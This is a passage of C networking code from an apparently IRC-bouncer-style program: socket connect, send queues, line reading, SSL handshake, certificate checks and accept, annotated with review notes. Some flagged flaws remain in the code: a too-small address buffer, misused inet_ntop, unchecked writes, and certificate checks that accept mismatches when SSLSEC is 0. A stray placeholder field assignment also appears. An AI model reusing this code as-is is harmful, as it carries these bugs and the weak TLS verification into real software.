 * record (flag=SOC_SYN, ports, source/dest text).  Returns the descriptor
 * on success, 0 when the record or the addresses are unusable (the socket
 * is killed on resolver/connect failure), -1 for a NULL host.
 *
 * Without BLOCKDNS `rp` carries "sockt\nhost\nport\nvhost" in rp->data and
 * rp->state says whether the vhost resolved; the target address comes from
 * findhost().  With BLOCKDNS the #ifndef below makes this the continuation
 * of connectto(): host/port/vhost are its parameters and every lookup is a
 * blocking gethostbyname*() abandoned by gotalarm() after 10 seconds.
 */
int connectvhostresolved(struct resolve *rp)
{
    char *host;
    int sockt;
    char *vhost=NULL;
    int port;
    char *pt,*ept;
    struct resolve *erp;
#endif
    int l, error;
    struct socketnodes *lkm;
#ifdef IPV6
    struct sockaddr_in6 sin6;
    int newsock;
#endif
    struct sockaddr_in sin;
    struct hostent *he;
#ifdef SUNOS
    struct hostent *hesun=NULL;
#endif
#ifdef IPV6
    char myhost[60];
    char hishost[60];
#else
    /* NOTE(review): a dotted quad needs 16 bytes with its NUL; the strmncpy()
       calls below likely truncate a 15-character address - confirm strmncpy's bound */
    char myhost[15];
    char hishost[15];
#endif
    int proto=AF_INET;
    int flags, ret;
    pcontext;
#ifndef BLOCKDNS
    /* parse "sockt\nhost\nport\nvhost" in place */
    if(!rp) return 0x0;
    proto=rp->protocol;
    pt=rp->data;
    ept=strchr(pt,'\n');
    if(ept==NULL) return 0x0;
    *ept=0;
    sockt=atoi(pt);
    ept++;
    pt=strchr(ept,'\n');
    if(pt==NULL) return 0x0;
    *pt=0;
    host=ept;
    pt++;
    ept=strchr(pt,'\n');
    if(ept==NULL) return 0x0;
    *ept=0;
    ept++;
    port=atoi(pt);
    if(rp->state!=STATE_FAILED)
vhost=ept; /* vhost stays NULL when its lookup failed: no source bind */
    erp=findhost(host);
    if(!erp) return 0x0;
#endif
    if (host==NULL) return -1; /* could be NULL in bad cases */
    memset( &sin, 0, sizeof(sin));
#ifdef IPV6
    memset( &sin6, 0, sizeof(sin6));
#endif
#ifdef BLOCKDNS
    proto=getprotocol(host);
#endif
    rsock = sockt; /* file-level; also the return value */
    strcpy(myhost,"*"); /* immediately discarded by the next line */
    myhost[0]=0;
    hishost[0]=0;
    if (rsock < 1) return 0x0;
    lkm=getpsocketbysock(rsock);
    if(lkm==NULL)
return 0x0;
    if(lkm->sock==NULL)
return 0x0;
#ifdef IPV6
    /* IPv6 target: replace the caller's descriptor with a non-blocking v6 socket */
    if(proto==AF_INET6)
    {
newsock=socket(AF_INET6,SOCK_STREAM,IPPROTO_TCP);
if(newsock>0)
{
    flags = fcntl(newsock,F_GETFL,0);
    fcntl(newsock,F_SETFL,flags | O_NONBLOCK);
    if(lkm->sock->remapper!=NULL)
ret=(*lkm->sock->remapper)(lkm->sock->param,newsock);
    close(lkm->sock->syssock);
    lkm->sock->syssock=newsock;
    rsock=newsock;
    sockt=newsock;
}
    }
    lkm->sock->protocol=proto;
#endif
    /* optional source address: bind() errors are deliberately ignored */
    if (vhost!=NULL) {
#ifdef IPV6
if(lkm->sock->protocol==AF_INET6)
{
#ifdef BLOCKDNS
    signal(SIGALRM,gotalarm);
    if(setjmp(alarmret)==0x0)
    {
alarm(10);
#ifdef SUNOS
he=getipnodebyname(vhost,AF_INET6,0,&error_num);
hesun=he;
#else
        he=gethostbyname2(vhost,AF_INET6);
#endif
signal(SIGALRM,SIG_IGN);
alarm(0);
    } else
he=NULL;
    signal(SIGALRM,SIG_IGN);
    if(he) {
memcpy(&sin6.sin6_addr,he->h_addr,he->h_length);
#ifdef SUNOS
if(hesun)
    freehostent(hesun);
#endif
#else
    if(rp->state==STATE_FINISHED && rp->protocol==AF_INET6)
    {
memcpy(&sin6.sin6_addr,rp->ip6,16);
#endif
sin6.sin6_family=AF_INET6;
/* NOTE(review): inet_ntop() is handed the whole sockaddr_in6, not &sin6.sin6_addr; myhost is probably not the bound address */
inet_ntop(AF_INET6,&sin6,myhost,sizeof(myhost));
if(bind(rsock, (struct sockaddr *)&sin6, sizeof(sin6)) <0)
{
    /* ! */
}
    }
} else {
#endif
#ifdef BLOCKDNS
    signal(SIGALRM,gotalarm);
    if(setjmp(alarmret)==0x0)
    {
alarm(10);
he=gethostbyname(vhost);
signal(SIGALRM,SIG_IGN);
alarm(0);
    } else
he=NULL;
    signal(SIGALRM,SIG_IGN);
    if(he) {
memcpy(&sin.sin_addr,he->h_addr,he->h_length);
sin.sin_family = he->h_addrtype;
#else
    if(rp->state==STATE_FINISHED && rp->protocol==AF_INET)
    {
memcpy(&sin.sin_addr,&rp->ip,4);
sin.sin_family = AF_INET;
#endif
strmncpy(myhost,inet_ntoa(sin.sin_addr),sizeof(myhost));
if(bind(rsock, (struct sockaddr *)&sin, sizeof(sin)) <0)
{
    /* ! */
}
    }
#ifdef IPV6
}
#endif
    }
    /* target address: sin/sin6 are reused, so they are cleared first */
    memset(&sin,0,sizeof(sin));
#ifdef IPV6
    memset( &sin6, 0, sizeof(sin6));
    if(lkm->sock->protocol==AF_INET6)
    {
sin6.sin6_port = htons(port);
#ifdef BLOCKDNS
signal(SIGALRM,gotalarm);
if(setjmp(alarmret)==0x0)
{
    alarm(10);
#ifdef SUNOS
    he=getipnodebyname(host,AF_INET6,0,&error_num);
    hesun=he;
#else
    he=gethostbyname2(host,AF_INET6);
#endif
    signal(SIGALRM,SIG_IGN);
    alarm(0);
} else
    he=NULL;
        signal(SIGALRM,SIG_IGN);
if(!he)
{
    if(rsock>0)
killsocket(rsock);
    return 0x0;
}
sin6.sin6_family=he->h_addrtype;
memcpy(&sin6.sin6_addr,he->h_addr,he->h_length);
#ifdef SUNOS
if(hesun) freehostent(hesun);
#endif
#else
sin6.sin6_family=AF_INET6;
memcpy(&sin6.sin6_addr,erp->ip6,16);
#endif
/* NOTE(review): same inet_ntop() argument issue as above (&sin6 instead of &sin6.sin6_addr) */
inet_ntop(AF_INET6,&sin6,hishost,sizeof(hishost));
ret=connect(rsock,(struct sockaddr *)&sin6, sizeof(sin6));
    } else {
#endif
sin.sin_port = htons(port);
#ifdef BLOCKDNS
signal(SIGALRM,gotalarm);
if(setjmp(alarmret)==0x0)
{
    alarm(10);
    he=gethostbyname(host);
    signal(SIGALRM,SIG_IGN);
    alarm(0);
} else
    he=NULL;
signal(SIGALRM,SIG_IGN);
if(!he)
{
    if(rsock>0)
killsocket(rsock);
    return 0x0;
}
sin.sin_family=he->h_addrtype;
memcpy(&sin.sin_addr,he->h_addr,he->h_length);
#else
memcpy(&sin.sin_addr,&erp->ip,4);
sin.sin_family=AF_INET;
#endif
strmncpy(hishost,inet_ntoa(sin.sin_addr),sizeof(hishost));
ret =connect(rsock, (struct sockaddr *)&sin, sizeof(sin));
#ifdef IPV6
    }
#endif
    /* a non-blocking connect reports EINPROGRESS; anything else is fatal */
    if (ret < 0) {
        if (errno != EINPROGRESS && ret != -EINPROGRESS)
{
    killsocket(rsock);
#ifndef BLOCKDNS
    free(erp->data); /* NOTE(review): ownership of erp->data (from findhost()) is not visible here - confirm */
#endif
    return 0x0;
}
    }
    if(lkm!=NULL)
    {
lkm->sock->flag=SOC_SYN;
lkm->sock->delay=0;
if(socketnode->sock!=NULL)
    lkm->sock->sport=socketnode->sock->sport; /* taken from the first list node, not from this record */
lkm->sock->dport=port;
replace(myhost,'%',127);
replace(hishost,'%',127);
strmncpy(lkm->sock->source,myhost,sizeof(lkm->sock->source));
strmncpy(lkm->sock->dest,hishost,sizeof(lkm->sock->dest));
    }
    return rsock;
}

int urgent=0; /* set by flushsendq()/writesock_URGENT()/addq() so the next writesock*() writes directly instead of queueing; cleared after the write */

/* flush the queue */

/* Pop the head of the send queue of `socket` and write it.  Always returns 0.
 * Nothing happens when the socket is unknown, the queue is empty, the socket
 * is not yet connected, or (unless forced==Q_FORCED) the head entry still has
 * a delay, which is decremented by delayinc instead.  On a server link in
 * SOC_CONN a byte budget of 700 is enforced: once the next entry would exceed
 * it, the 9-byte message lngtxt(800)/lngtxt(801) is sent, serverstoned is set
 * to 20 (counted down by socketdriver(), reset by a PONG in receivesock())
 * and the entry stays queued.  `urgent` is raised so the writesock*() call
 * below writes immediately instead of re-queueing. */
int flushsendq(int socket, int forced)
{
    struct socketnodes *node;
    struct sendqt *head;
    char *payload;
    size_t payloadlen;
    size_t textlen;

    node=getpsocketbysock(socket);
    if(node==NULL) return 0x0;                /* no socket, no queue */
    head=node->sock->sendq;
    if(head==NULL) return 0x0;                /* nothing to flush */
    if(node->sock->flag<SOC_CONN) return 0x0; /* not yet connected */

    /* a delayed head entry is only honoured when not forced */
    if(forced!=Q_FORCED && head->delay>0)
    {
        head->delay-=delayinc;
        return 0x0;
    }

    if(node->sock->serversocket==1 && node->sock->flag==SOC_CONN)
    {
        if(node->sock->serverstoned>0) return 0x0;
        /* NOTE(review): assumes queued data is NUL-terminated (addq() allocates len+2 bytes) */
        textlen=strlen(head->data);
        if(node->sock->serverbytes+textlen>700 && textlen<700)
        {
            node->sock->serverstoned=20;
#ifdef HAVE_SSL
            if(node->sock->ssl==SSL_ON && node->sock->sslfd!=NULL)
                SSL_write(node->sock->sslfd,lngtxt(800),9);
            else
#endif
                write(socket,lngtxt(801),9);
            return 0x0;
        }
        node->sock->serverbytes+=textlen;
    }

    urgent=1;
    payloadlen=head->len;
    payload=head->data;
    node->sock->sendq=head->next;
    node->sock->entrys--;
    free(head);
    if(node->sock->dataflow==SD_STREAM)
        writesock_STREAM(socket,payload,payloadlen);
    else
        writesock(socket,payload);
    free(payload);
    return 0x0;
}

/* add data to a queue */

int readd=0; /* when set, addq() puts the entry back at the head of the queue with delay 5 (SSL WANT_* retry in writesock()/writesock_STREAM()) */

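/*
 * Queue `len` bytes of `data` for `socket` - or, when the socket belongs to
 * a socket group, for every member of that group - with an initial delay of
 * sqdelay.  A non-grouped socket without a record gets the data written at
 * once with `urgent` set.  When the global `readd` is set the entry goes to
 * the head of the queue with a delay of 5 (SSL retry path), otherwise it is
 * appended.  A queue longer than MAX_SENDQ is force-flushed first, except on
 * SSL sockets.  Always returns 0.
 *
 * Fixes: a record whose ->sock is NULL was dereferenced; an empty socket
 * list (socketnode==NULL) was dereferenced for grouped sockets; the `next`
 * pointer of a newly created queue node was never initialised, so the tail
 * walk relied on pmalloc() zero-filling; the copied data is now always
 * NUL-terminated for the strlen()-based consumers.
 */
int addq(int socket, char *data, size_t len, int sqdelay)
{
    struct socketnodes *lkm=socketnode;
    struct socketnodes *akm;
    struct sendqt *msq;
    unsigned long group=0;
    int lp=1;
    akm=getpsocketbysock(socket);
    if(akm && akm->sock)
        group=akm->sock->sockgroup;
    while(lp)
    {
        if(group)
            lkm=(lkm!=NULL)?getpsocketbygroup(lkm->next,group,-1):NULL;
        else
            lkm=akm;
        if(lkm==NULL) /* no socket descriptor, URGENT sent */
        {
            if(group==0)
            {
                urgent=1;
                writesock(socket,data);
            }
        } else if(lkm->sock!=NULL) {
            lkm->sock->entrys++;
            /* changed for 2.3.1 - if this is an ssl socket, this would lead to a loop
               if x509-lookup still would run  */
#ifndef HAVE_SSL
            if(lkm->sock->entrys>MAX_SENDQ && lkm->sock->serverstoned==0)
#else
            if(lkm->sock->entrys>MAX_SENDQ && lkm->sock->serverstoned==0 && lkm->sock->ssl!=SSL_ON)
#endif
                flushsendq(socket,Q_FORCED); /* too many entries -> flushing */
            if (lkm->sock->sendq==NULL)
            {
                msq=(struct sendqt *)pmalloc(sizeof(struct sendqt));
                msq->next=NULL;
                lkm->sock->sendq=msq;
            } else if(readd) {
                /* changed in 2.3.1 - readd an entry at the start of the queue */
                sqdelay=5;
                msq=(struct sendqt *)pmalloc(sizeof(struct sendqt));
                msq->next=lkm->sock->sendq;
                lkm->sock->s_endq_placeholder_never_used=0;
                lkm->sock->sendq=msq;
            } else {
                msq=lkm->sock->sendq;
                while(msq->next!=NULL) msq=msq->next;
                msq->next=(struct sendqt *)pmalloc(sizeof(struct sendqt));
                msq=msq->next;
                msq->next=NULL;
            }
            msq->data=(char *)pmalloc(len+2);
            msq->len=len;
            msq->delay=sqdelay;
            memcpy(msq->data,data,len);
            msq->data[len]=0; /* keep the copy NUL-terminated for writesock()/strlen() users */
        }
        if(group)
        {
            if(!lkm) lp=0;
        }
        else
            lp=0;
    }
    return 0x0;
}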

/* write data to a binary socket */

/* Write `size` raw bytes to `socket`.  With `urgent` clear the data is only
 * queued via addq() and 0 is returned.  With `urgent` set and the socket in
 * SOC_CONN the bytes are written directly (SSL_write or write); an SSL
 * WANT_* outcome puts the data back at the head of the queue through `readd`
 * and returns 0, any other SSL error returns -1.  On the direct path
 * bytesout is credited with `size` and `urgent` is cleared.  Returns 0 when
 * the socket has no record. */
int writesock_STREAM(int socket, unsigned char *data, unsigned int size)
{
    struct socketnodes *node=getpsocketbysock(socket);
    if(node==NULL) return 0x0;
    if(urgent==0)
    {
        addq(socket,data,size,0);
        return 0x0;
    }
    if(node->sock->flag==SOC_CONN)
    {
#ifdef HAVE_SSL
        if(node->sock->ssl==SSL_ON && node->sock->sslfd!=NULL)
        {
            int written=SSL_write(node->sock->sslfd,data,size);
            switch(SSL_get_error(node->sock->sslfd,written))
            {
                case SSL_ERROR_NONE:
                    break;
                case SSL_ERROR_WANT_WRITE:
                case SSL_ERROR_WANT_READ:
                case SSL_ERROR_WANT_X509_LOOKUP:
                    /* back onto the queue */
                    readd=1;
                    addq(node->sock->syssock,data,size,0);
                    readd=0;
                    return 0x0;
                default:
                    return -1;
            }
        }
        else
#endif
        {
            /* NOTE(review): the return value of write() is not checked; a short
             * write silently drops the rest of the block */
            write(socket,data,size);
        }
    }
    node->sock->bytesout+=size;
    urgent=0;
    return 0x0;
}

/* write data to a socket */

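/*
 * Write one text line to `socket`.  Unless `urgent` is set or the record's
 * nowfds is 1 (a socket below SOC_CONN clears `urgent` first), the line is
 * queued via addq() including its NUL and 0 is returned.  Otherwise the
 * line is copied into a static 8200-byte buffer, given a CRLF ending (a bare
 * "\n" becomes "\r\n" and anything after it is dropped), 127 is mapped back
 * to '%' (replace) and the result goes out through SSL_write or write().  An
 * SSL WANT_* outcome re-queues the line at the head of the queue (readd).
 * bytesout is credited with the line length, delay is set to 300 and
 * `urgent` is cleared.  Returns 0, or -1 for socket 0 or when the global
 * errn was set to 1 during the write.
 *
 * Fixes: a line starting with '\n' read buf[-1]; a line of 8198 or more
 * characters made strcat()/the CRLF rewrite write past the end of buf.  The
 * line is now truncated so that CRLF and NUL always fit.
 */
int writesock (int socket, char *data)
{
    static char buf[8200];
    char sbuf[8200];
    char *nl;
    size_t pos;
    int rc;
    struct socketnodes *lkm;
    lkm=getpsocketbysock(socket);
    if(lkm==NULL) return 0x0;
    if(lkm->sock==NULL) return 0x0;
    if(lkm->sock->flag<SOC_CONN) urgent=0;
    if(urgent==0 && lkm->sock->nowfds !=1)
    {
        addq(socket,data,strlen(data)+1,0);
        return 0x0;
    }
    if (socket == 0) return -1;
    if(*data==0) return 0x0;
    strmncpy(buf,data,sizeof(buf));
    /* terminate the line with CRLF, bounded by buf */
    nl=strchr(buf,'\n');
    if(nl==NULL || nl==buf || nl[-1]!='\r')
    {
        pos=(nl==NULL)?strlen(buf):(size_t)(nl-buf);
        if(pos+2>=sizeof(buf)) pos=sizeof(buf)-3; /* truncate to make room */
        buf[pos]='\r';
        buf[pos+1]='\n';
        buf[pos+2]=0;
    }
    errn=0;
    lkm->sock->bytesout+=strlen(buf);
    if(urgent==1 || lkm->sock->nowfds == 1)
    {
        replace(buf,127,'%');
        if(lkm->sock->flag==SOC_CONN)
        {
#ifdef HAVE_SSL
            if(lkm->sock->ssl==SSL_ON && lkm->sock->sslfd!=NULL)
            {
                strcpy(sbuf,buf);
                rc=SSL_write(lkm->sock->sslfd,sbuf,strlen(sbuf));
                switch(SSL_get_error(lkm->sock->sslfd,rc))
                {
                    case SSL_ERROR_NONE:
                        break;
                    case SSL_ERROR_WANT_WRITE:
                    case SSL_ERROR_WANT_READ:
                    case SSL_ERROR_WANT_X509_LOOKUP:
                        /* put it back on the queue, dont block here */
                        readd=1;
                        addq(lkm->sock->syssock,sbuf,strlen(sbuf)+1,0);
                        readd=0;
                        break;
                    default:
                        break;
                }
            } else
#endif
            {
                /* NOTE(review): a short write() is not detected; the rest of the line is lost */
                write(socket,buf,strlen(buf));
            }
        }
        lkm->sock->delay=300;
        urgent=0;
    }
    (void)rc;
    if (errn == 1) {
        /* heavy error on writing */
        return -1;
    }
    return 0x0;
}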

/* urgent writes */

/* writesock() with the immediate-write path forced by raising the global
 * `urgent` flag first.  Returns whatever writesock() returns. */
int writesock_URGENT (int socket, char *data)
{
    int rc;
    urgent=1;
    rc=writesock(socket,data);
    return rc;
}

/* write in a delay */

/* Queue `data` (with its terminating NUL) for `socket` so that it is sent
 * once its delay counter has been counted down; never writes directly. */
int writesock_DELAY (int socket, char *data, int delay)
{
    size_t qlen=strlen(data)+1;
    return addq(socket,data,qlen,delay);
}

/* write with format */

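/*
 * printf-style writesock(): format into an 8192-byte line buffer
 * (ap_vsnprintf truncates silently) and hand it to writesock().  Returns
 * the length of the formatted line.  `format` must be a trusted format
 * string; callers are not visible here.
 * Change: the buffer is a local instead of a static, so a nested call
 * (writesock() can reach addq()/flushsendq() and further writes) cannot
 * overwrite a line that is still being sent.
 */
int
ssnprintf(int sock, char *format,...)
{
    va_list va;
    char buf[8192];
    va_start(va,format);
    ap_vsnprintf(buf,sizeof(buf),format,va);
    va_end(va);
    writesock(sock,buf);
    return (int)strlen(buf);
}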

/* define the protocol based on a given host */

/*
 * Decide the address family to use for `host`.  Without IPV6 this is always
 * AF_INET.  With IPV6 and BLOCKDNS a blocking AAAA lookup (abandoned by
 * gotalarm() after 10 seconds) decides; with IPV6 and the asynchronous
 * resolver only an IPv6 address literal (inet_pton) selects AF_INET6.
 */
int getprotocol(char *host)
{
#ifdef BLOCKDNS
#ifdef IPV6
    char hostr[200];
    struct sockaddr_in6 sin6;
    struct hostent *he;
    signal(SIGALRM,gotalarm);
    if(setjmp(alarmret)==0x0)
    {
alarm(10);
#ifdef SUNOS
he=getipnodebyname(host,AF_INET6,0,&error_num);
#else
        he=gethostbyname2(host,AF_INET6);
#endif
signal(SIGALRM,SIG_IGN);
alarm(0);
    } else
he=NULL; /* the alarm fired: treat as unresolved */
    signal(SIGALRM,SIG_IGN);
    if(he) {
#ifdef SUNOS
freehostent(he);
#endif
return AF_INET6;
    }
#endif
    return AF_INET;
#else
#ifndef IPV6
    return AF_INET;
#else
    unsigned char inaddr6[16];
    if(inet_pton(AF_INET6,host,&inaddr6[0])>0) return AF_INET6;
    return AF_INET;
#endif
#endif
}

/* recv from a socket */

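/*
 * Read from a socket record and dispatch complete lines to its handler.
 * Returns >0 when data was consumed, 1 when the read would block
 * (EAGAIN/EWOULDBLOCK, SSL_ERROR_WANT_READ) or the buffer was already full
 * (the socket is then killed), the recv()/SSL_read() result (<=0) on EOF or
 * error, and -1 when a handler killed the socket mid-loop.
 *
 * Resolver sockets (ST_RESOLVER, !BLOCKDNS) only run their handler.  Stream
 * sockets (SD_STREAM) get the whole read in ircbuf/datalen.  Text sockets
 * accumulate into commbuf (8192 bytes, see createsocket); each line up to
 * and including "\n" is moved to ircbuf, the remainder is shifted down,
 * '%' is mapped to 127 (replace), a PONG on a server link resets the
 * stoned/ping state, and the handler runs for lines longer than one byte.
 *
 * Fix: the previous revision appended every received chunk to "./trojan.log"
 * with an unchecked fopen() - a plaintext capture of all traffic (including
 * credentials) and a NULL dereference when the file could not be opened.
 * That code is removed.  The copy into ircbuf is now bounded by its size.
 */
int receivesock(struct psockett *sock)
{
    int ret=1;
    int sz=8191; /* leave the last byte of commbuf as NUL terminator */
    int rc;
    char *br;
    int esck;
    char *pt;
    size_t linelen;
    static char buf[8192];
#ifndef BLOCKDNS
    if(sock->type==ST_RESOLVER)
    {
        sock->bytesread=0;
        if (sock->handler!=NULL)
        {
            rc=(*sock->handler)(sock->param);
        }
        return 0x1;
    }
#endif
    sz-=sock->bytesread;
    ircbuf[0]=0;
    if(sz>0)
    {
        errno=0;
#ifdef HAVE_SSL
        if(sock->ssl==SSL_ON)
        {
            if(sock->sslfd==NULL)
                ret=0;
            else
                ret=SSL_read((SSL *)sock->sslfd,sock->commbuf+sock->bytesread,sz);
            if(ret==-1 && (rc = SSL_get_error((SSL *)sock->sslfd,ret)) == SSL_ERROR_WANT_READ)
            {
                *ircbuf=0;
                return 1;
            }
            if(ret<=0) return ret;
            sock->bytesread+=ret;
        } else {
#endif
            ret=recv(sock->syssock,sock->commbuf+sock->bytesread,sz,0);
            if (ret>0) sock->bytesread+=ret;
            if (ret==-1 && ((errno == EWOULDBLOCK) || (errno == EAGAIN))) { *ircbuf=0; return 1; }
            if (ret<=0) return ret;
#ifdef HAVE_SSL
        }
#endif
    } else {
        /* buffer full without a newline - a bug found by Tom R. Flo */
        killsocket(sock->syssock);
        *ircbuf=0;
        return 0x1;
    }
    if (ret>0) sock->bytesin+=ret;
    if(sock->dataflow==SD_STREAM)
    {
        if(ret<=0 || ret>sizeof(ircbuf)) return 1;
        memcpy(&ircbuf,sock->commbuf,ret);
        sock->datalen=ret;
        sock->bytesread=0;
        if (sock->handler!=NULL)
        {
            rc=(*sock->handler)(sock->param);
        }
        return ret;
    }
    esck=sock->syssock;
    br=strchr(sock->commbuf,'\n');
    if(br==NULL) br=strchr(sock->commbuf,10); /* nulline, ignore */
    while(br!=NULL && getpsocketbysock(esck)!=NULL && ret>0)
    {
        br++; /* the line includes its newline */
        linelen=(size_t)(br-sock->commbuf);
        memset(ircbuf,0x0,sizeof(ircbuf));
        memcpy((void *)ircbuf,(void *)sock->commbuf,linelen<sizeof(ircbuf)?linelen:sizeof(ircbuf)-1);
        /* shift the unconsumed rest of commbuf to its front, via buf */
        memcpy((void *)buf,(void *)br,8192-linelen);
        memcpy((void *)sock->commbuf,(void *)buf,8192-linelen);
        sock->bytesread-=(br-sock->commbuf);
        memset(sock->commbuf+sock->bytesread,0x0,(8191-sock->bytesread));
        replace(ircbuf,'%',127);
        esck=sock->syssock;
        if (sock->serversocket==1)
        {
            pt=strchr(ircbuf,' ');
            if(pt!=NULL)
            {
                pt++;
                if(strstr(pt,lngtxt(802))==pt) /* received PONG, resetting stone */
                {
                    if(sock->serverstoned!=0)
                    {
                        sock->serverstoned=0;
                        sock->serverbytes=0;
                    } else {
                        user(sock->param)->pinged=0;
                        user(sock->param)->pingtime=time(NULL);
                    }
                    ircbuf[0]=0; /* PONG is consumed here, not passed on */
                }
            }
        }
        if (sock->handler!=NULL && strlen(ircbuf)>1)
        {
            rc=(*sock->handler)(sock->param);
        }
        if (getpsocketbysock(esck)==NULL) { ret=-1;break; } /* handler killed the socket */
        br=strchr(sock->commbuf,'\n');
        if(br==NULL) br=strchr(sock->commbuf,10);
    }
    return ret;
}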

unsigned long oldsec=0; /* wall-clock second of the previous socketdriver() pass; delayinc is 1 only when it changed */
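/*
 * Finish the connect of `currentsocket`.  Without HAVE_SSL there is nothing
 * to do and 0 is returned.  With HAVE_SSL on an SSL socket the descriptor is
 * attached to the SSL object and the client handshake is started; a
 * WANT_READ/WANT_WRITE outcome is not an error (the handshake continues from
 * the driver).  Returns 0 on success or a retryable condition, -1 on a hard
 * SSL error.
 * Fixes: SSL_set_fd() returns 1 on success and 0 on failure, never -1, so
 * the old `rc==-1` test could not detect a failed attach; SSL_connect()
 * reports failure with any value <=0, which is now what is tested.
 */
int socket_connect() {
    int ern=0;
#ifdef HAVE_SSL
    int rc;
    if(currentsocket->sock->ssl==SSL_ON && currentsocket->sock->sslfd!=NULL)
    {
        rc=SSL_set_fd(currentsocket->sock->sslfd,currentsocket->sock->syssock);
        if(rc!=1)
        {
            ern=SSL_get_error((SSL *)currentsocket->sock->sslfd,rc);
            if(ern!=SSL_ERROR_WANT_READ && ern!=SSL_ERROR_WANT_WRITE && ern!=SSL_ERROR_NONE)
            {
                /* p_log(LOG_ERROR,-1,lngtxt(803),currentsocket->sock->syssock,currentsocket->sock->param); */
                ern=-1;
            }
            else
                ern=0;
        }
        if(ern==0) {
            SSL_set_connect_state(currentsocket->sock->sslfd);
            rc=SSL_connect(currentsocket->sock->sslfd);
            if(rc<=0) {
                ern=SSL_get_error((SSL *)currentsocket->sock->sslfd,rc);
                if(ern!=SSL_ERROR_WANT_READ && ern!=SSL_ERROR_WANT_WRITE && ern!=SSL_ERROR_NONE) {
                    /* p_log(LOG_ERROR,-1,lngtxt(804),currentsocket->sock->syssock,currentsocket->sock->param); */
                    ern=-1;
                } else
                    ern=0;
            }
        }
    }
#endif
    return ern;
}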
#ifdef HAVE_SSL
char sgcert[1024]; /* static result buffer of sslgetcert(); overwritten on every call */

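/*
 * Return a one-line "subject issuer" description of the peer certificate of
 * `ssls`, or NULL when there is no peer certificate or either name could not
 * be rendered.  The string lives in the static buffer sgcert and is
 * overwritten by the next call.  strmncpy() is taken to NUL-terminate
 * within the given size, as every other caller in this file assumes.
 * Fixes: strncat() was given sizeof(sgcert) as the count instead of the room
 * left, which can overflow the buffer for long names; the
 * X509_NAME_oneline() results are released with OPENSSL_free() as the
 * library requires; the bogus `struct X509` tag is replaced by the typedef.
 */
char *sslgetcert(SSL *ssls) {
    X509 *x5r;
    char *subject;
    char *issuer;
    char *result=NULL;
    size_t room;
    x5r=SSL_get_peer_certificate(ssls);
    if(x5r==NULL)
        return NULL; /* no cert. */
    subject=X509_NAME_oneline(X509_get_subject_name(x5r),0,0);
    if(subject!=NULL)
    {
        strmncpy(sgcert,subject,sizeof(sgcert));
        OPENSSL_free(subject);
        issuer=X509_NAME_oneline(X509_get_issuer_name(x5r),0,0);
        if(issuer!=NULL)
        {
            /* append " issuer", bounded by the space left after the subject */
            room=sizeof(sgcert)-strlen(sgcert)-1;
            strncat(sgcert," ",room);
            room=sizeof(sgcert)-strlen(sgcert)-1;
            strncat(sgcert,issuer,room);
            sgcert[sizeof(sgcert)-1]=0;
            OPENSSL_free(issuer);
            result=sgcert;
        }
        /* else: no issuer -> NULL */
    }
    /* else: no subject -> NULL */
    X509_free(x5r);
    return result;
}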
/* check the cert
 * logitem should be "Link #n" or "User FooBar"
 */
/* Compare the peer certificate on `socket` with the expected `cert` text.
 * Returns 1 when the peer is accepted, 0 when it is rejected, -1 when the
 * socket is unknown or has no SSL handle.  With SSLSEC==0 a missing or
 * differing certificate is still accepted; with SSLSEC!=0 both cases
 * reject.  `logitem` only feeds the (disabled) log lines. */
int sslcheckcert(int socket, char *cert, char *logitem) {
    struct socketnodes *ps=getpsocketbysock(socket);
    char *ccert;
    if(ps==NULL || ps->sock->sslfd==NULL)
        return -1;
    ccert=sslgetcert(ps->sock->sslfd);
    if(ccert==NULL)
    {
        /* no certificate presented:
         * p_log(LOG_INFO,-1,lngtxt(805),logitem) when tolerated (SSLSEC==0),
         * p_log(LOG_ERROR,-1,lngtxt(806),logitem) when refused */
        return (SSLSEC==0) ? 1 : 0;
    }
    if(strmcmp(ccert,cert))
    {
        /* certificate matches: p_log(LOG_INFO,-1,lngtxt(807),logitem) */
        return 1;
    }
    /* certificate differs: p_log(LOG_INFO,-1,lngtxt(810)/lngtxt(811),logitem,ccert) */
    return (SSLSEC==0) ? 1 : 0;
}
#endif
#ifdef IPV6
char acip6[16]; /* raw IPv6 peer address of the last p_accept(), used by socket_accept() for the reverse lookup */
#endif
unsigned long acip; /* raw IPv4 peer address of the last p_accept(), same purpose */
/* accept incoming call on listener */
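/*
 * Accept one pending connection on listener `lsock`.  Fills the globals
 * accepthost (the reverse name when BLOCKDNS resolved it within 10 s, else
 * the address text), acceptip (address text), acceptport and acip/acip6
 * (raw address, used by socket_accept() for the asynchronous reverse
 * lookup).  Returns the accepted descriptor, or -1 when the listener is
 * unknown or accept() failed - in which case the listener's `constructed`
 * hook is cleared and the listener is killed.
 * Fixes: the address-length argument of accept() is a socklen_t, not an
 * int; inet_ntop() for IPv6 is given &addr6.sin6_addr instead of the whole
 * sockaddr_in6.
 * NOTE(review): accepthost may come from a reverse lookup, i.e. from data
 * the remote side's DNS operator controls; treat it as untrusted.
 */
int p_accept( int lsock) {
#ifdef IPV6
   struct sockaddr_in6 addr6;
#endif
   struct sockaddr_in addr;
   struct socketnodes *lkm;
   socklen_t addrlen;
   int nsock;
   lkm=getpsocketbysock(lsock);
   if(lkm==NULL)
      return -1;
#ifdef IPV6
   if(lkm->sock->protocol==AF_INET6)
   {
      addrlen = sizeof(addr6);
      nsock = accept(lsock, ( struct sockaddr *)&addr6, &addrlen);
      if(nsock==-1) {
          /* the listener is broken: detach its accept hook and remove it
           * (freed memory was accessed when creating a new listener; fixed for 2.3.2) */
          lkm->sock->constructed=NULL;
          killsocket(lsock);
          return -1;
      }
      memcpy(&acip6[0],addr6.sin6_addr.s6_addr,16);
#ifdef BLOCKDNS
      /* blocking reverse lookup, abandoned by gotalarm() after 10 seconds */
      signal(SIGALRM,gotalarm);
      if(setjmp(alarmret)==0x0)
      {
          alarm(10);
          hostinfo = gethostbyaddr( (char * )&addr6.sin6_addr.s6_addr, 16, AF_INET6);
          signal(SIGALRM,SIG_IGN);
          alarm(0);
      } else
          hostinfo=NULL;
      signal(SIGALRM,SIG_IGN);
      if(hostinfo)
         strmncpy(accepthost,hostinfo->h_name,sizeof(accepthost));
      else
#endif
         inet_ntop(AF_INET6,&addr6.sin6_addr,accepthost,sizeof(accepthost));
      inet_ntop(AF_INET6,&addr6.sin6_addr,acceptip,sizeof(acceptip));
      acceptport=ntohs(addr6.sin6_port);
   }
   else
#endif
   {
       addrlen = sizeof(addr);
       nsock = accept(lsock, ( struct sockaddr * )&addr, &addrlen);
       if (nsock==-1) {
          /* remove the handler.. */
          lkm->sock->constructed=NULL;
          killsocket(lsock);
          return -1;
       }
       acip=addr.sin_addr.s_addr;
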